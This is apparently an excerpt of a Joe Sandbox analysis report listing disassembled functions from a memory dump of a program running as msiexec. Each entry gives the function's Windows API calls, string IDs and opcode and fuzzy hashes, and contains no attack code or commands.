                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$CloseHandle
                                                                                                                                                • String ID: General
                                                                                                                                                • API String ID: 3722638380-26480598
                                                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                • String ID: d=E
                                                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                • String ID: "
                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                • String ID: URL
                                                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                • String ID: %%-%d.%ds
                                                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID: F^@
                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                • String ID: WinPos
                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                • API String ID: 2773794195-880857682
                                                                                                                                                • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                • free.MSVCRT ref: 0040A908
                                                                                                                                                • free.MSVCRT ref: 0040A92B
                                                                                                                                                • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                • free.MSVCRT ref: 0040B201
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                • free.MSVCRT ref: 0040B224
                                                                                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 726966127-0
